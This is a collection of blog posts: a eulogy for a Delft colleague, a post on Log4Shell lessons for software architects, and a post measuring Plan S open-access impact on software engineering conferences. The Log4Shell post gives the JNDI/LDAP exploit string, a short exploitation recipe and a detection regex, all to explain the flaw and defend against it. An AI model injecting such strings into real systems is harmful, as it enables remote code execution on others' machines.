Partly because of this, Eelco’s research was of the highest international level. Let me illustrate this with an award he received in 2020: a so-called “Most Influential Paper” Award. You only receive such an award once your article, 10 years after publication, has turned out to have had the most influence.

Eelco received it for his 2010 article on Spoofax, written with PhD student Lennart Kats. Eelco was, rightly, very proud of this. So proud that he wrote a (long) blog post about it, entitled A short history of the Spoofax language workbench.

This “short history” begins in 1993 with Eelco’s PhD research in Amsterdam. Eelco then describes his journey, from Portland as a postdoc, via Utrecht as assistant professor, to Delft as associate professor and full professor. Each of these stops yields building blocks for the winning 2010 paper. And then Eelco’s “short history” continues: he describes what his group has done in the ten years since the paper, and what good things he still has in store for the time to come.

As far as I am concerned, this “short history” is Eelco through and through:

visionary, working year in, year out on building blocks that all belong together
system-driven, with working software systems that he preferably helps program himself
in a team, together with his PhD students, postdocs, engineers, students, and countless international colleagues.

This short history also shows something of the international dimension of Eelco’s work. He was very active, and well loved, within international organizations such as IFIP and ACM SIGPLAN. He succeeded in bringing the flagship SPLASH conference to Europe for the first time.

And of course Eelco had a vision of how things could be done better: all those conferences cobbling together their own web sites, surely that could be done more efficiently. And so, in line with his systems philosophy, he designed the CONF system, which has now been up and running for ten years. And he managed to convince hundreds of conferences to use his system, for a fee.

In education, too, Eelco had a vision, and he knew how to realize it. Programming education had to be better, he felt, and so he designed a system, WebLab, which has also been up and running for almost 10 years now. And here too he managed to convince countless teachers to use his system.

In addition, Eelco had a well-considered opinion about which courses belong in a computer science program. When we had to revise our curriculum, Eelco was the perfect candidate to chair the associated committee. Eelco did this with verve, calmly and persistently, reasoning from educational principles to settle disputes. The result is rock solid.

What Willem-Paul Brinkman wrote in the online book of condolences holds for Eelco’s teaching: “Without perhaps realizing it, many generations of Delft students will benefit from his teaching innovations.”

Eelco was proud of his “Programming Languages Group”. He built it up from nothing into an international top group. He took good care of his people, and fought for the best equipment and workplaces. As a member of the department’s management team, he championed computer science in its full breadth, at faculty and university level. He was also active nationally, including in the Dutch National Association for Software Engineering VERSEN.

And how did Eelco manage all this? What was his secret?

Perhaps Eelco actually rather enjoyed (a little) resistance. He was not afraid to push back: after all, he had thought carefully about his opinion. And he was fine with meeting opposition: that was a sign that he was well on his way to breaking the status quo.

Perhaps not everyone always found this easy. But Eelco was also very friendly, and certainly willing to change his mind.

And Eelco was patient, too: great changes take time. If he saw that he did not have enough supporters, he could wait. Or, under the radar, start small in order to set his own plans in motion anyway.

How we will miss Eelco in Delft. The visionary, the contrarian, the focus on content, the love for the field, the tenacity, and the attention for student and colleague: that is exactly what we need in Delft.

I would like to close with a few words prompted by Corona and the lockdown. Over the past two years, Eelco and I were in touch weekly, mainly within the department’s management team, but also often one-on-one, all online, from home. We discussed the ins and outs of the department, and the impact of Corona. On one thing we agreed: being at home more, seeing more of your children, doing more with the family: we both experienced this as a gift.

Because of the lockdown I do not know when I last saw Eelco in person. I think it was 14 October, at the PhD defense of Arjen Rouvoet. That was a beautiful day, and this is how I like to remember Eelco: science at the highest level, international colleagues in substantive debate, a cum laude PhD defense, and Eelco happy, radiant in the midst of his PL group.

Dear family, friends, colleagues, everyone: we will miss Eelco very much. Each of us has his or her own, wonderful memories of Eelco. Today is a day to hold on to them, and to share those memories with each other.

I wish you all, and the family in particular, much strength.

14Dec2021

Log4Shell: Lessons Learned for Software Architects

Posted in Development by Arie van Deursen

This week, the log4shell vulnerability in the Apache log4j library was discovered (CVE-2021-44228). Exploiting this vulnerability is extremely simple, and log4j is used in many, many software systems that are critical to society: a lethal combination. What are the key lessons you as a software architect can draw from this?

The vulnerability

In versions 2.0-2.14.1, the log4j library would take special action when logging messages containing "${jndi:ldap://LDAP-SERVER/a}": it would look up a Java class on the LDAP server mentioned, and execute that class.

This should of course never have been a feature, as it is almost the definition of a remote code execution vulnerability. Consequently, the steps to exploit a target system are alarmingly simple:

Create a nasty class that you would like to execute on your target;
Set up your own LDAP server somewhere that can serve your nasty class;
"Attack" your target by feeding it strings of the form "${jndi:ldap://LDAP-SERVER/a}" wherever possible: in web forms, search forms, HTTP requests, etc. If you’re lucky, some of this user input is logged, and just like that your nasty class gets executed.

Interestingly, this recipe can also be used to make a running instance of a system immune to such attacks, in an approach dubbed logout4shell: If your nasty class actually wants to be friendly, it can programmatically disable remote JNDI execution, thus safeguarding the system against any new attacks (until the system is restarted).

The source code for logout4shell is available on GitHub: it also serves as an illustration of how extremely simple any attack will be.
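On the defensive side, the exploit string described above has a shape that is easy to recognize. The following is a minimal Python sketch, not part of log4j or of any official tooling, of a check that could be run over user input or existing log files. The names `JNDI_PATTERN`, `looks_like_jndi_lookup` and `suspicious_lines` are hypothetical, and the pattern only covers the plain form of the lookup: obfuscated variants are not detected, so a match is a hint for investigation and no substitute for upgrading.

```python
import re

# Hypothetical pattern: matches the literal "${jndi:" prefix, case-insensitively.
# Obfuscated variants (for example nested lookups) are NOT covered by this sketch.
JNDI_PATTERN = re.compile(r"\$\{jndi:", re.IGNORECASE)


def looks_like_jndi_lookup(text: str) -> bool:
    """Return True if the text contains a plain JNDI lookup expression."""
    return JNDI_PATTERN.search(text) is not None


def suspicious_lines(lines):
    """Yield (line_number, line) for every line containing a plain JNDI lookup."""
    for number, line in enumerate(lines, start=1):
        if looks_like_jndi_lookup(line):
            yield number, line


if __name__ == "__main__":
    # Made-up log excerpt, for illustration only.
    sample_log = [
        "GET /search?q=shoes",
        "User-Agent: ${jndi:ldap://LDAP-SERVER/a}",
    ]
    for number, line in suspicious_lines(sample_log):
        print(f"line {number}: {line}")
```

Running such a scan over access logs can help answer the question of whether someone has already tried the attack, which is relevant for the next section.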

Under attack

As long as your system is vulnerable, you should assume you or your customers are under attack:

Depending on the type of information stored or services provided, (foreign) nation states may use the opportunity to collect as much (confidential) information as possible, or infect the system so that it can be accessed later;
Ransomware "entrepreneurs" are delighted by the log4shell opportunity. No doubt their investments in an infrastructure to scan systems for this vulnerability and ensure future access to these systems will pay off.
Insiders, intrigued by the simplicity of the exploit, may be tempted to explore systems beyond their access levels.

All this calls for a system setup according to the highest security standards: deployments that are isolated as much as possible, access logs, and the ability to detect unwarranted changes (infections) to deployed systems.

Applying the Fix

Naturally, the new release of log4j, version 2.15, contains a fix. Thus, the direct solution for affected systems is to simply upgrade the log4j dependency to 2.15, and re-deploy the safe system as soon as possible.

This may be more involved in some cases, due to backward incompatibilities that may have been introduced. For example, in version 2.13 support for Java 7 was stopped. So if you’re still on Java 7, just upgrading log4j is not as simple (and you may have other security problems than just log4shell). If you’re still stuck with log4j 1.x (end-of-life since 2015), then log4shell isn’t a problem, but you have other security problems instead.
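To decide which deployments need the upgrade, the version ranges mentioned in this post can be turned into a small check. This is a sketch in Python under stated assumptions: the function names are hypothetical, version strings are assumed to be purely numeric and dot-separated (pre-release tags such as "-beta9" are not handled), and the affected range is simply the 2.0 to 2.14.1 range given above.

```python
def parse_version(version: str) -> tuple:
    """Turn a dotted version such as '2.14.1' into a tuple of ints, e.g. (2, 14, 1)."""
    return tuple(int(part) for part in version.split("."))


def is_log4shell_affected(version: str) -> bool:
    """True for versions from 2.0 up to and including 2.14.1 (range taken from the post)."""
    return (2, 0) <= parse_version(version) <= (2, 14, 1)


if __name__ == "__main__":
    # Illustrative version numbers only.
    for candidate in ["1.2.17", "2.13.0", "2.14.1", "2.15.0"]:
        status = "affected" if is_log4shell_affected(candidate) else "not affected by log4shell"
        print(f"log4j {candidate}: {status}")
```

Note that "not affected by log4shell" is not the same as "safe": as argued above, a 1.x version falls outside the range but is end-of-life.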

Furthermore, log4j is widely used in other libraries you may depend on, such as Apache Flink, Apache Solr, neo4j, Elasticsearch, or Apache Struts: See the list of over 150 affected systems. Upgrading such systems may be more involved, for example if you’re a few versions behind or if you’re stuck with Java 7. Earlier, I described how upgrading a system using Struts, Spring, and Hibernate took over two weeks of work.

All this serves as a reminder of the importance of dependency hygiene: the need to ensure dependencies are at their latest versions at all times. Upgrading versions can be painful in case of backward incompatibilities. This pain should be swallowed as early as possible, and not postponed until the moment an urgent security upgrade is needed.

Deploying the Fix

Deploying the fix yourself should be simple: with an adequate continuous deployment infrastructure it takes no more than a push of a button or a reaction to a commit.

If your customers need to install an upgraded version of your system themselves, things may be harder. Here investments in a smooth update process pay off, as well as a disciplined versioning approach that encourages customers to update their system regularly, with as few incompatibility roadblocks as possible.

If your system is a library, you’re probably using semantic versioning. Ideally, the upgrade’s only change is the upgrade of log4j, meaning your release can simply increment the patch version identifier. If necessary, you can consider backporting the patch to earlier major releases.
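As an illustration of the patch-level release described here, the sketch below increments the patch identifier of a MAJOR.MINOR.PATCH version and does the same for a list of maintained release lines, which is what a backport would amount to. It is written in Python under the assumption of plain three-part numeric versions. The function names and the version numbers in the usage example are hypothetical.

```python
def bump_patch(version: str) -> str:
    """Increment the PATCH part of a MAJOR.MINOR.PATCH version string."""
    major, minor, patch = (int(part) for part in version.split("."))
    return f"{major}.{minor}.{patch + 1}"


def backport_releases(maintained_versions):
    """Return the patch release to publish for each maintained release line."""
    return [bump_patch(version) for version in maintained_versions]


if __name__ == "__main__":
    # Hypothetical latest releases of three maintained major versions of a library.
    print(backport_releases(["1.8.4", "2.3.0", "3.1.9"]))
```

Because only the patch identifier changes, users with a version range that accepts patch updates can pick up the fix without touching their own code.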

Your Open Source Stack

As illustrated by log4shell, most modern software stacks critically depend on open source libraries. If you benefit from open source, it is imperative that you donate back. This can be in kind, by freeing your own developers to contribute to open source. A simpler approach may be to donate money, for example to the Apache Software Foundation. This can also buy you influence, to make sure the open source libraries develop the features you want, or conduct the security audits that you hope for.

The Role of the Architect

As a software architect your key role is not to react to an event like log4shell. Instead, it is to design a system that minimizes the likelihood of such an event and the impact it would have on the confidentiality, integrity and availability of that system.

This requires investments in:

Maintainability: enforcing dependency hygiene, keeping dependencies current at all times, to minimize mean time to repair and maximize availability;
Deployment security: isolating components where possible and logging access, to safeguard confidentiality and integrity;
Upgradability: ensuring that those who have installed your system or who use your library can seamlessly upgrade to (security) patches;
The open source ecosystem: sponsoring the development of open source components you depend on, and contributing to their security practices.

To make this happen, you must guide the work of multiple people, including developers, customer care, operations engineers, and the security officer, and secure sufficient resources (including time and money) for them. Most importantly, this requires that as an architect you must be an effective communicator at multiple levels, from developer to CEO, from engine room to penthouse.

20Aug2019

Europe’s Open Access “Plan S” and Paper Publishing in Software Engineering Research

Posted in Society by Arie van Deursen

A year ago, more than a dozen influential research funders in Europe launched Plan S. This plan poses, from 2021 onwards, strict requirements on open access publishing of any research funded through the Plan S coalition. To understand what this means for my field of research, software engineering, I did some data collection. My data suggests that 14% (one out of seven) of the published papers are affected, meaning that conferences may lose 14% of their papers, unless publishers take action.

Plan S in a Nutshell

Plan S is an initiative launched by:

The European Union, which runs the Horizon Europe program of €100 billion (over 113 billion US dollars). It is the successor to H2020, and includes funding for the prestigious personal grants of the European Research Council (ERC).
Twelve national research funding organizations, from various European countries, such as The Netherlands (where I live), the United Kingdom, and Austria.

The aim of these Plan S “funders” (collectively called “Coalition S”), is that

With effect from 2021, all scholarly publications on the results from research funded by public or private grants provided by national, regional and international research councils and funding bodies, must be published in Open Access Journals, on Open Access Platforms, or made immediately available through Open Access Repositories without embargo.

The coalition has taken an axiomatic approach to expressing its plans, starting with 10 principles, followed by a Guidance to the Implementation. The result is a somewhat hard-to-understand document, in which there are multiple ways to become Plan S compliant.

In all forms of Plan S compliance the Creative Commons license plays a key role. As Plan S (under the header Rights and Licensing) puts it:

The public must be granted a worldwide, royalty-free, non-exclusive, irrevocable license to share (i.e., copy and redistribute the material in any medium or format) and adapt (i.e., remix, transform, and build upon the material) the article for any purpose, including commercial, provided proper attribution is given to the author.

This, thus, corresponds to the Creative Commons Attribution license, also known as CC BY. Note that this is a very generous license, essentially allowing anyone to do anything with the paper. Traditionally, publishers do not like this, as they wish to keep exclusive control over who distributes the paper.

Strictly speaking, Plan S does not require CC BY per se, but authors need to ask permission for any other license. For the CC BY-SA “Share-Alike” variant of the license permission will be granted automatically, but for CC BY-ND “No Derivatives” permission needs to be asked. Coalition S explicitly indicates that CC BY-NC “Non-Commercial” is not allowed:

We will not accept a Non-Commercial restriction on the re-use of research results.

Given this CC BY starting point, Plan S distinguishes three routes to compliance:

Open access venues: The conference or journal is gold open access, meaning all papers in it are freely available. This is “the ideal” case, from Plan S perspective, and compliant. Open access fees (“Article Processing Charges”) are common in this route, and will be refunded by Coalition S.
Subscription-based venues: These by themselves are non-compliant, but can be made compliant if the author immediately (no embargo) deposits the Author’s Accepted Manuscript (AAM) in a compliant repository with a CC BY license. This license is a complicating factor, since many publishers pose restrictions on redistribution of self-archived papers (they are self-archived, and no one else can do this, which is at odds with the sharing principle of CC BY). If such restrictions exist, a way out is available if the venue permits hybrid open access, in which authors can pay an extra fee to make their own article available as open access with a CC BY license. This model is offered by many publishers, but not by all. Note, however, that while this route is “compliant”, Plan S does not refund the APC fees.
Subscription venues in transition: If the conference or journal is not open access yet, but in transition towards a full open access model by 2024, the publisher and Plan S can agree on “transformative arrangements”. In this case the paper will be compliant, and if there are fees involved they will (likely) be covered.
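The three routes can be read as a small decision procedure. The Python sketch below encodes my reading of the routes listed above and is not an official Plan S compliance checker. The `Venue` fields, the function name, the order in which the routes are tried, and the venue names in the usage example are all assumptions made for illustration.

```python
from dataclasses import dataclass


@dataclass
class Venue:
    """Hypothetical description of a publication venue."""
    name: str
    gold_open_access: bool = False            # all papers freely available
    transformative_arrangement: bool = False  # in transition to full open access
    allows_cc_by_self_archiving: bool = False # AAM may be deposited with CC BY, no embargo
    offers_hybrid_cc_by: bool = False         # author can pay to publish with CC BY


def plan_s_route(venue: Venue) -> str:
    """Return the first applicable route; the order of the checks is an assumption."""
    if venue.gold_open_access:
        return "open access venue (compliant, fees refunded)"
    if venue.transformative_arrangement:
        return "venue in transition (compliant, fees likely covered)"
    if venue.allows_cc_by_self_archiving:
        return "self-archiving with CC BY (compliant)"
    if venue.offers_hybrid_cc_by:
        return "hybrid open access with CC BY (compliant, fee not refunded)"
    return "not compliant"


if __name__ == "__main__":
    # Made-up venues, one per outcome of interest.
    venues = [
        Venue("Gold Conference", gold_open_access=True),
        Venue("Hybrid Journal", offers_hybrid_cc_by=True),
        Venue("Closed Conference"),
    ]
    for venue in venues:
        print(f"{venue.name}: {plan_s_route(venue)}")
```

The routes that cost the author least are tried first here; an actual funder may weigh them differently.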

The 10 principles also address other issues relevant to open access: they require that “the structure of fees must be transparent” (principle 05, suggesting that some of the current article processing charges are unexplainably high), and warn that the funders will monitor compliance and sanction non-compliant beneficiaries/grantees (principle 09, a direct threat to me).

Plan S should start in 2021, although publishers can earn some extra time by participating in the above-mentioned “transformative arrangements”.

Plan S Compliance in Software Engineering Research

To understand whether Plan S compliant publishing in my area of research, software engineering, is possible at the moment, I looked at the top 20 venues in the area of Software Systems, according to Google Metrics.

In these top 20 venues, just three are gold open access: POPL and OOPSLA, both published by ACM SIGPLAN, and ETAPS TACAS, published by Springer. It is in these venues that authors funded through Coalition S can safely publish, following the gold open access route to compliance. Their open access fees will be covered by the Coalition S funders.

The remaining 17 are closed access subscription venues, published by ACM, IEEE, Elsevier and Springer. Authors who wish to publish there, and who need to be compliant with Plan S, would then have to resort to the self-archiving route.

Since the self-archiving constraints of these four publishers do not permit the use of CC BY without a fee, the hybrid route applies, in which (1) authors pay a fee; (2) the publisher distributes with CC BY; and (3) the author shares on a Plan S compliant repository. Note that this route is compliant, but that the fee is not refunded by Coalition S.

This self-archiving route works for IEEE journals, but not for IEEE conferences. This is because for IEEE conferences presently authors do not have the option to pay a fee to publish just their own paper open access (unlike ACM). As stated by IEEE in their FAQ on the “IEEE Policy Regarding Authors Rights to Post Accepted Versions of Their Articles”:

Currently IEEE does not have an Open Access program for conference articles.

In other words: Conferences published by IEEE are not Plan S compliant, not even with the green open access route (as IEEE does not permit CC BY).

Of the 20 venues, IEEE is the sole publisher of two conferences (ICSME and SANER), one magazine (IEEE Software), and the co-publisher of another three (ICSE, SANER, MSR) which are published alternatingly by IEEE or ACM.

In summary, of the 20 top venues:

Three are compliant through gold open access.
Eleven are compliant through a fee-based hybrid model with CC BY.
Three are half of the time compliant through a fee-based hybrid model with CC BY, the other half non-compliant.
Three can presently not be made compliant.

Note that other fields may fare better: top conferences in security (Usenix), AI (AAAI, NIPS), or programming languages (OOPSLA/POPL/ICFP, sponsored by SIGPLAN) are all full gold open access. This, however, seems the exception rather than the rule.

Plan S Rationale

With Plan S requiring many publishers to change their policies, one may wonder what the rationale behind this plan is. The way I see it, the key reason for the European funders to propose this plan is leverage, in the following ways:

The European Union as a whole will benefit more from their €100 billion investment, if any (European) citizen can freely access the resulting knowledge;
Research is never conducted in isolation. Progress in research is not just visible in papers directly funded through a project, but also in subsequent papers building on top of those results (refuting, strengthening, criticizing, or expanding them). The more venues are open access, the higher the chance that these follow up results are also published as open access.
The universities in the European Union together will benefit financially if the publishing market shifts towards open access: The current profit margins of up to 40% of publishing giants like Elsevier are a waste of taxpayer money that instead should be directly invested in research and education, the exact same causes that the EU and its Horizon Europe program seek to advance as well. Pumping €100 billion into a system that wastes money at scale is ineffective.

Furthermore, note that this coalition works in all areas of research, including climate change, health care, and artificial intelligence. From the European perspective, the world needs informed societal debate about these topics. To that end, the EU is committed to maximizing the free availability of any research it is funding.

Last but not least, Coalition S is working hard to expand the list of funders, talking to both China and India, for example. Jordan and Zambia have already joined, as has the Bill and Melinda Gates Foundation (though its presence in computer science research is limited compared to, e.g., China).

Impact on Software Engineering Conferences

With software engineering venues so clearly affected by Plan S, the next question is how many papers will be affected. Thus, I decided to collect some data, to measure the impact of Plan S in my field.

Since conferences (with full-length, rigorously reviewed papers) are dominant in software engineering, I focused on these. I picked two editions of ICSE and ESEC/FSE (for which I am a member of the steering committee), as well as the smaller and more specialized ISSTA conference (which I happened to attend this summer).

For each published paper, I manually checked the acknowledgments to see whether the authors were beneficiaries of any of the Plan S funders. I did this for the main (technical research) track papers only, and not for, e.g., demonstration sub-tracks.

The results (also available as a spreadsheet) are as follows:

A few results stand out:

Overall, 14% (1 in 7) of the papers currently receive grants from Coalition S.
The two big conferences, ICSE (over 1000 participants) and ESEC/FSE (over 300 participants), exhibit an impact on around 11-12% of the papers.
For the smaller ISSTA conference, more than 25% of the papers are (co-)funded through Coalition S. This number reflects the composition of the community, and the impact is enlarged by the small total number of papers. Should the affected researchers decide not to submit to ISSTA anymore, this may constitute an existential threat to the conference.
The EU is by far the biggest funder, with researchers and industry from many countries benefiting from participation in large EU projects. Furthermore, the EU ERC (Advanced) Grants are extremely prestigious (€2.5 million) and have been won by leaders in the software engineering field such as (in the collected data) Carlo Ghezzi, Mark Harman, Bashar Nuseibeh, and Andreas Zeller.
The UK is the second biggest funder, mostly through its EPSRC program. This is the UK’s national program, unrelated to the European Union. Thus, EPSRC’s participation in Coalition S will not be affected by Brexit (apart from increased financial pressure on EPSRC’s overall budget as the UK’s economy is shrinking).
While a small country with limited funds, Luxembourg is very active in the area of software engineering, causing high impact for, e.g., the ISSTA conference.

The 14% I found is substantially higher than the estimate of 6% impact found by Clarivate Analytics (cited by the ACM), and the 5% found by the ACM itself. If anything, this difference of a factor of 3, or even a factor of 5 for ISSTA, calls for a detailed assessment for each venue affected.

My data is based on what I saw in the acknowledgments: in reality it is likely that more papers are affected. You can check your own papers in my online spreadsheet; corrections are welcome.

Collecting the data took me around a minute per paper. You are cordially invited to repeat this exercise for your own favorite conference or journal (TSE, EMSE, JSS, MSR, ICSME, RE, MODELS, …), and I will do my best to reflect your data in this post. If you’re a conference organizer, the safest thing to do is to survey authors about their funding, enquiring explicitly about Coalition S based funding.
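
For anyone repeating the exercise on a larger venue, a first-pass filter over acknowledgment texts might save some time. The sketch below is not how the numbers in this post were obtained (those were checked by hand); it is a minimal illustration in Python. The keyword list and the function names `plan_s_funders` and `affected_share` are my own assumptions: the list covers only funders named in this post plus a few common spellings of EU programs, and would need to be extended with the full Coalition S membership.

```python
import re

# Illustrative keyword list (an assumption, not the method used for this post).
# Matching is case-sensitive on purpose, so that "ERC" does not match inside
# ordinary words. Extend with the full list of Coalition S funders.
FUNDER_PATTERNS = {
    "EU": r"\b(European Union|European Commission|Horizon 2020|H2020|"
          r"ERC|European Research Council)\b",
    "EPSRC": r"\bEPSRC\b",
    "NWO": r"\bNWO\b",
}


def plan_s_funders(acknowledgment: str) -> list[str]:
    """Return the funders whose pattern occurs in the acknowledgment text."""
    return [name for name, pattern in FUNDER_PATTERNS.items()
            if re.search(pattern, acknowledgment)]


def affected_share(acknowledgments: list[str]) -> float:
    """Fraction of papers whose acknowledgments mention at least one funder."""
    if not acknowledgments:
        return 0.0
    hits = sum(1 for text in acknowledgments if plan_s_funders(text))
    return hits / len(acknowledgments)
```

A filter like this only flags candidates. Papers without a funding acknowledgment, or with a funder spelled in an unexpected way, will be missed, so the result is a lower bound that still needs a manual check.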

There is another point to be made that required little data gathering.

The 14% figure relates to impact on the conference. Individual researchers can be affected much more. Our group at TU Delft, for example, has been very successful in attracting substantial funding both from the EU and from the Dutch NWO. As a consequence, for me personally, half of my publications will be affected. For some new PhD students starting in my group and funded through such projects, all publications will be affected.

A Call for Action

Clearly, the impact of Plan S can be substantial, on individual researchers as well as on conferences and journals.

This calls for action.

ACM, as one of the leading publishers in computer science, shared an update on their Plan S progress in their July 2019 newsletter. It states:

It is worth noting that ACM has been working with various consortia in the US, Europe, and elsewhere on a framework for transitioning the traditional ACM Digital Library licensing (subscription) model to a Gold Open Access model utilizing an innovative “transformative agreement” model. More details will be announced later in 2019 as the first of these Agreements are executed; once these are in place, all ACM Publications will comply with the majority of Plan S requirements.

This is good news, and certainly not a simple undertaking. I sincerely hope that ACM will be able to meet not just the majority, but all requirements, and for all conferences and journals. This essentially implies a change of business model for the ACM Digital Library, from a subscription-based to an author-(institution)-pays model. This in itself will not be easy, and is further complicated by several constraints and strong criteria imposed by Plan S, for example concerning cost transparency. The key challenge will be to convince Coalition S that these criteria are indeed met.

The ACM Special Interest Group on Programming Languages, SIGPLAN, meanwhile, sets an example on how to progress within the current setting. The research papers of three of its key conferences are published as part of the Proceedings of the ACM in Programming Languages. This is a Gold Open Access journal in which different volumes are devoted to different conferences. The POPL, OOPSLA, and ICFP conferences have adopted this model, and hence are fully open access. To quote the Inaugural Editorial Message by Philip Wadler:

PACMPL is a Gold Open Access journal. It will be archived in ACM’s Digital Library, but no membership or fee is required for access. Gold Open Access has been made possible by generous funding through ACM SIGPLAN, which will cover all open access costs in the event authors cannot. Authors who can cover the costs may do so by paying an Article Processing Charge (APC). PACMPL, SIGPLAN, and ACM Headquarters are committed to exploring routes to making Gold Open Access publication both affordable and sustainable.

The ACM SIG for Software Engineering, SIGSOFT, so far has not taken action along these lines. Nevertheless, this is simple to do, especially since SIGPLAN has laid all the groundwork.

Furthermore, last year, we as ACM SIGSOFT members elected Tom Zimmermann as our chair. In his statement for the elections he wrote:

We should make gold open access a priority for SIGSOFT

He also provided details on how to achieve this, mostly along the lines of SIGPLAN. By electing him, we as ACM SIGSOFT members gave him the mandate to carry this out. This will not be easy to do, and it calls for the support of the full software engineering research community to help the ACM SIGSOFT leadership with this important mission.

The other main non-profit society publisher in software engineering is the IEEE. IEEE publishes various conferences and journals in software engineering on its own, such as ICSME, MODELS, RE and ICST. Furthermore, several major conferences are co-sponsored by IEEE and ACM together, such as ICSE and ASE.

Unfortunately, I have not been able to find online information about IEEE’s vision on Plan S, and its impact on the conference proceedings published by the IEEE. This makes it very unclear what, from 2021 onwards, the publication options are for many software engineering conferences.

Nevertheless, it is my hope that IEEE will embrace Plan S, and move to open access conference proceedings, as many other society publishers have done.

This, then, will open the floor to joint open access publications, for example through the new fully open access “Proceedings of the ACM in Software Engineering”.

Version History

Version 0.4, 20-08-2019. First public version.
Version 0.5, 25-08-2019. Major update to reflect that self-archiving route can also be used to meet Plan S requirements.
Version 0.6, 26-08-2019. Small updates about CC BY options.
Version 0.7, 28-08-2019. Major update about repository route in combination with CC BY and hybrid open access, and transformative arrangements.
Version 0.8, 30-08-2019. Add links to IEEE open access FAQ.
Version 0.9, 04-09-2019. Small typos fixed.

Note: IANAL — use this information at your own risk.

Acknowledgements: Thanks to Diomidis Spinellis, Simon Bains, Jeroen Bosman, Bianca Kramer, and Jeroen Sondervan for feedback on earlier drafts of this post.

Arie van Deursen
